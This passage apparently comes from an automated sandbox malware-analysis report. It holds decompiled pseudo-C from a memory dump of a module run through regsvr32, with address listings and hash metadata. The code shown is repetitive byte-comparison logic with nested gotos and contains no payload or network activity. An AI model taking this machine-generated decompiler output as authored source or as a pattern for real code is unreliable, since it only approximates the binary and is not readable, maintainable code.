                                                                                                                													_t309 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
                                                                                                                													if(_t309 != 0) {
                                                                                                                														_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                                                													}
                                                                                                                													goto L81;
                                                                                                                												}
                                                                                                                												_t309 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
                                                                                                                												if(_t309 != 0) {
                                                                                                                													goto L1;
                                                                                                                												}
                                                                                                                												goto L78;
                                                                                                                											}
                                                                                                                											_t309 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                                											if(_t309 != 0) {
                                                                                                                												goto L1;
                                                                                                                											}
                                                                                                                											goto L76;
                                                                                                                										}
                                                                                                                										_t309 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
                                                                                                                										if(_t309 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										goto L74;
                                                                                                                									}
                                                                                                                									_t321 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
                                                                                                                									if(_t321 == 0) {
                                                                                                                										L63:
                                                                                                                										_t323 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
                                                                                                                										if(_t323 == 0) {
                                                                                                                											L65:
                                                                                                                											_t325 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
                                                                                                                											if(_t325 == 0) {
                                                                                                                												L67:
                                                                                                                												_t309 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
                                                                                                                												if(_t309 != 0) {
                                                                                                                													_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                                                												}
                                                                                                                												goto L70;
                                                                                                                											}
                                                                                                                											_t309 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                                                                                                                											if(_t309 != 0) {
                                                                                                                												goto L1;
                                                                                                                											}
                                                                                                                											goto L67;
                                                                                                                										}
                                                                                                                										_t309 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                                                                                                                										if(_t309 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										goto L65;
                                                                                                                									}
                                                                                                                									_t309 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                                                                                                                									if(_t309 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									goto L63;
                                                                                                                								}
                                                                                                                								_t328 = (_t204 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
                                                                                                                								if(_t328 == 0) {
                                                                                                                									L52:
                                                                                                                									_t330 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
                                                                                                                									if(_t330 == 0) {
                                                                                                                										L54:
                                                                                                                										_t332 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
                                                                                                                										if(_t332 == 0) {
                                                                                                                											L56:
                                                                                                                											_t309 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
                                                                                                                											if(_t309 != 0) {
                                                                                                                												_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                                                											}
                                                                                                                											goto L59;
                                                                                                                										}
                                                                                                                										_t309 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
                                                                                                                										if(_t309 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										goto L56;
                                                                                                                									}
                                                                                                                									_t309 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
                                                                                                                									if(_t309 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									goto L54;
                                                                                                                								}
                                                                                                                								_t309 = (0 | _t328 > 0x00000000) + (0 | _t328 > 0x00000000) - 1;
                                                                                                                								if(_t309 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								goto L52;
                                                                                                                							}
                                                                                                                							_t335 = (_t203 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
                                                                                                                							if(_t335 == 0) {
                                                                                                                								L41:
                                                                                                                								_t337 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
                                                                                                                								if(_t337 == 0) {
                                                                                                                									L43:
                                                                                                                									_t339 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
                                                                                                                									if(_t339 == 0) {
                                                                                                                										L45:
                                                                                                                										_t309 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
                                                                                                                										if(_t309 != 0) {
                                                                                                                											_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                                                										}
                                                                                                                										goto L48;
                                                                                                                									}
                                                                                                                									_t309 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
                                                                                                                									if(_t309 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									goto L45;
                                                                                                                								}
                                                                                                                								_t309 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
                                                                                                                								if(_t309 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								goto L43;
                                                                                                                							}
                                                                                                                							_t309 = (0 | _t335 > 0x00000000) + (0 | _t335 > 0x00000000) - 1;
                                                                                                                							if(_t309 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L41;
                                                                                                                						}
                                                                                                                						_t342 = (_t202 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
                                                                                                                						if(_t342 == 0) {
                                                                                                                							L30:
                                                                                                                							_t344 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
                                                                                                                							if(_t344 == 0) {
                                                                                                                								L32:
                                                                                                                								_t346 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
                                                                                                                								if(_t346 == 0) {
                                                                                                                									L34:
                                                                                                                									_t309 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
                                                                                                                									if(_t309 != 0) {
                                                                                                                										_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                                                									}
                                                                                                                									goto L37;
                                                                                                                								}
                                                                                                                								_t309 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
                                                                                                                								if(_t309 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								goto L34;
                                                                                                                							}
                                                                                                                							_t309 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
                                                                                                                							if(_t309 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L32;
                                                                                                                						}
                                                                                                                						_t309 = (0 | _t342 > 0x00000000) + (0 | _t342 > 0x00000000) - 1;
                                                                                                                						if(_t309 != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						goto L30;
                                                                                                                					}
                                                                                                                					_t349 = (_t201 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
                                                                                                                					if(_t349 == 0) {
                                                                                                                						L19:
                                                                                                                						_t351 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
                                                                                                                						if(_t351 == 0) {
                                                                                                                							L21:
                                                                                                                							_t353 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
                                                                                                                							if(_t353 == 0) {
                                                                                                                								L23:
                                                                                                                								_t309 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
                                                                                                                								if(_t309 != 0) {
                                                                                                                									_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                                                								}
                                                                                                                								goto L26;
                                                                                                                							}
                                                                                                                							_t309 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
                                                                                                                							if(_t309 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L23;
                                                                                                                						}
                                                                                                                						_t309 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
                                                                                                                						if(_t309 != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						goto L21;
                                                                                                                					}
                                                                                                                					_t309 = (0 | _t349 > 0x00000000) + (0 | _t349 > 0x00000000) - 1;
                                                                                                                					if(_t309 != 0) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					goto L19;
                                                                                                                				} else {
                                                                                                                					__esi = __dl & 0x000000ff;
                                                                                                                					__edx =  *(__ecx - 0x1e) & 0x000000ff;
                                                                                                                					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
                                                                                                                					if(__esi == 0) {
                                                                                                                						L8:
                                                                                                                						__esi =  *(__eax - 0x1d) & 0x000000ff;
                                                                                                                						__edx =  *(__ecx - 0x1d) & 0x000000ff;
                                                                                                                						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                                                                                                                						if(__esi == 0) {
                                                                                                                							L10:
                                                                                                                							__esi =  *(__eax - 0x1c) & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                                                							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L12:
                                                                                                                								__esi =  *(__eax - 0x1b) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                                                                                                								if(__esi != 0) {
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								}
                                                                                                                								goto L15;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L12;
                                                                                                                						}
                                                                                                                						0 = 0 | __esi > 0x00000000;
                                                                                                                						__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                						__esi = __edx;
                                                                                                                						if(__edx != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						goto L10;
                                                                                                                					}
                                                                                                                					0 = 0 | __esi > 0x00000000;
                                                                                                                					__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                					__esi = __edx;
                                                                                                                					if(__edx != 0) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					goto L8;
                                                                                                                				}
                                                                                                                				L1:
                                                                                                                				_t192 = _t309;
                                                                                                                				goto L3;
                                                                                                                			}

                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b73b
                                                                                                                0x1004b7bb
                                                                                                                0x1004b7bd
                                                                                                                0x1004b7bf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b7c5
                                                                                                                0x1004b7cb
                                                                                                                0x1004b84a
                                                                                                                0x1004b84c
                                                                                                                0x1004b84e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b85c
                                                                                                                0x1004b056
                                                                                                                0x1004b058
                                                                                                                0x1004bdb4
                                                                                                                0x1004bdb4
                                                                                                                0x1004b86a
                                                                                                                0x1004b86c
                                                                                                                0x1004b448
                                                                                                                0x1004b450
                                                                                                                0x1004b452
                                                                                                                0x1004b463
                                                                                                                0x1004b463
                                                                                                                0x00000000
                                                                                                                0x1004b452
                                                                                                                0x1004b879
                                                                                                                0x1004b87f
                                                                                                                0x1004bc98
                                                                                                                0x00000000
                                                                                                                0x1004bc98
                                                                                                                0x00000000
                                                                                                                0x1004b885
                                                                                                                0x1004b7d4
                                                                                                                0x1004b7d6
                                                                                                                0x1004b7ed
                                                                                                                0x1004b7f5
                                                                                                                0x1004b7f7
                                                                                                                0x1004b80e
                                                                                                                0x1004b816
                                                                                                                0x1004b818
                                                                                                                0x1004b82f
                                                                                                                0x1004b837
                                                                                                                0x1004b839
                                                                                                                0x1004b846
                                                                                                                0x1004b846
                                                                                                                0x00000000
                                                                                                                0x1004b839
                                                                                                                0x1004b825
                                                                                                                0x1004b829
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b829
                                                                                                                0x1004b804
                                                                                                                0x1004b808
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b808
                                                                                                                0x1004b7e3
                                                                                                                0x1004b7e7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b7e7
                                                                                                                0x1004b745
                                                                                                                0x1004b747
                                                                                                                0x1004b75e
                                                                                                                0x1004b766
                                                                                                                0x1004b768
                                                                                                                0x1004b77f
                                                                                                                0x1004b787
                                                                                                                0x1004b789
                                                                                                                0x1004b7a0
                                                                                                                0x1004b7a8
                                                                                                                0x1004b7aa
                                                                                                                0x1004b7b7
                                                                                                                0x1004b7b7
                                                                                                                0x00000000
                                                                                                                0x1004b7aa
                                                                                                                0x1004b796
                                                                                                                0x1004b79a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b79a
                                                                                                                0x1004b775
                                                                                                                0x1004b779
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b779
                                                                                                                0x1004b754
                                                                                                                0x1004b758
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b758
                                                                                                                0x1004b6b5
                                                                                                                0x1004b6b7
                                                                                                                0x1004b6ce
                                                                                                                0x1004b6d6
                                                                                                                0x1004b6d8
                                                                                                                0x1004b6ef
                                                                                                                0x1004b6f7
                                                                                                                0x1004b6f9
                                                                                                                0x1004b710
                                                                                                                0x1004b718
                                                                                                                0x1004b71a
                                                                                                                0x1004b727
                                                                                                                0x1004b727
                                                                                                                0x00000000
                                                                                                                0x1004b71a
                                                                                                                0x1004b706
                                                                                                                0x1004b70a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b70a
                                                                                                                0x1004b6e5
                                                                                                                0x1004b6e9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b6e9
                                                                                                                0x1004b6c4
                                                                                                                0x1004b6c8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b6c8
                                                                                                                0x1004b626
                                                                                                                0x1004b628
                                                                                                                0x1004b63f
                                                                                                                0x1004b647
                                                                                                                0x1004b649
                                                                                                                0x1004b660
                                                                                                                0x1004b668
                                                                                                                0x1004b66a
                                                                                                                0x1004b681
                                                                                                                0x1004b689
                                                                                                                0x1004b68b
                                                                                                                0x1004b698
                                                                                                                0x1004b698
                                                                                                                0x00000000
                                                                                                                0x1004b68b
                                                                                                                0x1004b677
                                                                                                                0x1004b67b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b67b
                                                                                                                0x1004b656
                                                                                                                0x1004b65a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b65a
                                                                                                                0x1004b635
                                                                                                                0x1004b639
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b639
                                                                                                                0x1004b597
                                                                                                                0x1004b599
                                                                                                                0x1004b5b0
                                                                                                                0x1004b5b8
                                                                                                                0x1004b5ba
                                                                                                                0x1004b5d1
                                                                                                                0x1004b5d9
                                                                                                                0x1004b5db
                                                                                                                0x1004b5f2
                                                                                                                0x1004b5fa
                                                                                                                0x1004b5fc
                                                                                                                0x1004b609
                                                                                                                0x1004b609
                                                                                                                0x00000000
                                                                                                                0x1004b5fc
                                                                                                                0x1004b5e8
                                                                                                                0x1004b5ec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b5ec
                                                                                                                0x1004b5c7
                                                                                                                0x1004b5cb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b5cb
                                                                                                                0x1004b5a6
                                                                                                                0x1004b5aa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b5aa
                                                                                                                0x1004b508
                                                                                                                0x1004b50a
                                                                                                                0x1004b521
                                                                                                                0x1004b529
                                                                                                                0x1004b52b
                                                                                                                0x1004b542
                                                                                                                0x1004b54a
                                                                                                                0x1004b54c
                                                                                                                0x1004b563
                                                                                                                0x1004b56b
                                                                                                                0x1004b56d
                                                                                                                0x1004b57a
                                                                                                                0x1004b57a
                                                                                                                0x00000000
                                                                                                                0x1004b56d
                                                                                                                0x1004b559
                                                                                                                0x1004b55d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004b55d
                                                                                                                0x1004b538
                                                                                                                0x1004b53c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                • Instruction ID: 92b78bd843577d70adc6c0f5fbd64983c0a0ea5f252a0995e29b88b46b4a0767
                                                                                                                • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                • Instruction Fuzzy Hash: 5AD17E73C0EDB30A83B5C12D40A822EEAA2AFC169133BC7F5DCD46F389D52A5D5496D4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1004B05E(void* __eax, void* __ecx) {
                                                                                                                				void* _t183;
                                                                                                                				signed int _t184;
                                                                                                                				void* _t187;
                                                                                                                				signed char _t193;
                                                                                                                				signed char _t194;
                                                                                                                				signed char _t195;
                                                                                                                				signed char _t196;
                                                                                                                				signed char _t198;
                                                                                                                				signed int _t296;
                                                                                                                				void* _t299;
                                                                                                                				void* _t301;
                                                                                                                				void* _t303;
                                                                                                                				void* _t306;
                                                                                                                				void* _t308;
                                                                                                                				void* _t310;
                                                                                                                				void* _t313;
                                                                                                                				void* _t315;
                                                                                                                				void* _t317;
                                                                                                                				void* _t320;
                                                                                                                				void* _t322;
                                                                                                                				void* _t324;
                                                                                                                				void* _t327;
                                                                                                                				void* _t329;
                                                                                                                				void* _t331;
                                                                                                                				void* _t334;
                                                                                                                				void* _t336;
                                                                                                                				void* _t338;
                                                                                                                
                                                                                                                				_t187 = __ecx;
                                                                                                                				_t183 = __eax;
                                                                                                                				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
                                                                                                                					_t296 = 0;
                                                                                                                					L12:
                                                                                                                					if(_t296 != 0) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					_t193 =  *(_t183 - 0x19);
                                                                                                                					if(_t193 ==  *(_t187 - 0x19)) {
                                                                                                                						_t296 = 0;
                                                                                                                						L23:
                                                                                                                						if(_t296 != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						_t194 =  *(_t183 - 0x15);
                                                                                                                						if(_t194 ==  *(_t187 - 0x15)) {
                                                                                                                							_t296 = 0;
                                                                                                                							L34:
                                                                                                                							if(_t296 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							_t195 =  *(_t183 - 0x11);
                                                                                                                							if(_t195 ==  *(_t187 - 0x11)) {
                                                                                                                								_t296 = 0;
                                                                                                                								L45:
                                                                                                                								if(_t296 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								_t196 =  *(_t183 - 0xd);
                                                                                                                								if(_t196 ==  *(_t187 - 0xd)) {
                                                                                                                									_t296 = 0;
                                                                                                                									L56:
                                                                                                                									if(_t296 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									if( *(_t183 - 9) ==  *(_t187 - 9)) {
                                                                                                                										_t296 = 0;
                                                                                                                										L67:
                                                                                                                										if(_t296 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										_t198 =  *(_t183 - 5);
                                                                                                                										if(_t198 ==  *(_t187 - 5)) {
                                                                                                                											_t296 = 0;
                                                                                                                											L78:
                                                                                                                											if(_t296 != 0) {
                                                                                                                												goto L1;
                                                                                                                											}
                                                                                                                											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
                                                                                                                											if(_t184 != 0) {
                                                                                                                												_t184 = (0 | _t184 > 0x00000000) + (0 | _t184 > 0x00000000) - 1;
                                                                                                                											}
                                                                                                                											L2:
                                                                                                                											return _t184;
                                                                                                                										}
                                                                                                                										_t299 = (_t198 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
                                                                                                                										if(_t299 == 0) {
                                                                                                                											L71:
                                                                                                                											_t301 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
                                                                                                                											if(_t301 == 0) {
                                                                                                                												L73:
                                                                                                                												_t303 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
                                                                                                                												if(_t303 == 0) {
                                                                                                                													L75:
                                                                                                                													_t296 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
                                                                                                                													if(_t296 != 0) {
                                                                                                                														_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                                                													}
                                                                                                                													goto L78;
                                                                                                                												}
                                                                                                                												_t296 = (0 | _t303 > 0x00000000) + (0 | _t303 > 0x00000000) - 1;
                                                                                                                												if(_t296 != 0) {
                                                                                                                													goto L1;
                                                                                                                												}
                                                                                                                												goto L75;
                                                                                                                											}
                                                                                                                											_t296 = (0 | _t301 > 0x00000000) + (0 | _t301 > 0x00000000) - 1;
                                                                                                                											if(_t296 != 0) {
                                                                                                                												goto L1;
                                                                                                                											}
                                                                                                                											goto L73;
                                                                                                                										}
                                                                                                                										_t296 = (0 | _t299 > 0x00000000) + (0 | _t299 > 0x00000000) - 1;
                                                                                                                										if(_t296 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										goto L71;
                                                                                                                									}
                                                                                                                									_t306 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
                                                                                                                									if(_t306 == 0) {
                                                                                                                										L60:
                                                                                                                										_t308 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
                                                                                                                										if(_t308 == 0) {
                                                                                                                											L62:
                                                                                                                											_t310 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
                                                                                                                											if(_t310 == 0) {
                                                                                                                												L64:
                                                                                                                												_t296 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
                                                                                                                												if(_t296 != 0) {
                                                                                                                													_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                                                												}
                                                                                                                												goto L67;
                                                                                                                											}
                                                                                                                											_t296 = (0 | _t310 > 0x00000000) + (0 | _t310 > 0x00000000) - 1;
                                                                                                                											if(_t296 != 0) {
                                                                                                                												goto L1;
                                                                                                                											}
                                                                                                                											goto L64;
                                                                                                                										}
                                                                                                                										_t296 = (0 | _t308 > 0x00000000) + (0 | _t308 > 0x00000000) - 1;
                                                                                                                										if(_t296 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										goto L62;
                                                                                                                									}
                                                                                                                									_t296 = (0 | _t306 > 0x00000000) + (0 | _t306 > 0x00000000) - 1;
                                                                                                                									if(_t296 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									goto L60;
                                                                                                                								}
                                                                                                                								_t313 = (_t196 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
                                                                                                                								if(_t313 == 0) {
                                                                                                                									L49:
                                                                                                                									_t315 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
                                                                                                                									if(_t315 == 0) {
                                                                                                                										L51:
                                                                                                                										_t317 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
                                                                                                                										if(_t317 == 0) {
                                                                                                                											L53:
                                                                                                                											_t296 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
                                                                                                                											if(_t296 != 0) {
                                                                                                                												_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                                                											}
                                                                                                                											goto L56;
                                                                                                                										}
                                                                                                                										_t296 = (0 | _t317 > 0x00000000) + (0 | _t317 > 0x00000000) - 1;
                                                                                                                										if(_t296 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										goto L53;
                                                                                                                									}
                                                                                                                									_t296 = (0 | _t315 > 0x00000000) + (0 | _t315 > 0x00000000) - 1;
                                                                                                                									if(_t296 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									goto L51;
                                                                                                                								}
                                                                                                                								_t296 = (0 | _t313 > 0x00000000) + (0 | _t313 > 0x00000000) - 1;
                                                                                                                								if(_t296 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								goto L49;
                                                                                                                							}
                                                                                                                							_t320 = (_t195 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
                                                                                                                							if(_t320 == 0) {
                                                                                                                								L38:
                                                                                                                								_t322 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
                                                                                                                								if(_t322 == 0) {
                                                                                                                									L40:
                                                                                                                									_t324 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
                                                                                                                									if(_t324 == 0) {
                                                                                                                										L42:
                                                                                                                										_t296 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
                                                                                                                										if(_t296 != 0) {
                                                                                                                											_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                                                										}
                                                                                                                										goto L45;
                                                                                                                									}
                                                                                                                									_t296 = (0 | _t324 > 0x00000000) + (0 | _t324 > 0x00000000) - 1;
                                                                                                                									if(_t296 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									goto L42;
                                                                                                                								}
                                                                                                                								_t296 = (0 | _t322 > 0x00000000) + (0 | _t322 > 0x00000000) - 1;
                                                                                                                								if(_t296 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								goto L40;
                                                                                                                							}
                                                                                                                							_t296 = (0 | _t320 > 0x00000000) + (0 | _t320 > 0x00000000) - 1;
                                                                                                                							if(_t296 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L38;
                                                                                                                						}
                                                                                                                						_t327 = (_t194 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
                                                                                                                						if(_t327 == 0) {
                                                                                                                							L27:
                                                                                                                							_t329 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
                                                                                                                							if(_t329 == 0) {
                                                                                                                								L29:
                                                                                                                								_t331 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
                                                                                                                								if(_t331 == 0) {
                                                                                                                									L31:
                                                                                                                									_t296 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
                                                                                                                									if(_t296 != 0) {
                                                                                                                										_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                                                									}
                                                                                                                									goto L34;
                                                                                                                								}
                                                                                                                								_t296 = (0 | _t331 > 0x00000000) + (0 | _t331 > 0x00000000) - 1;
                                                                                                                								if(_t296 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								goto L31;
                                                                                                                							}
                                                                                                                							_t296 = (0 | _t329 > 0x00000000) + (0 | _t329 > 0x00000000) - 1;
                                                                                                                							if(_t296 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L29;
                                                                                                                						}
                                                                                                                						_t296 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
                                                                                                                						if(_t296 != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						goto L27;
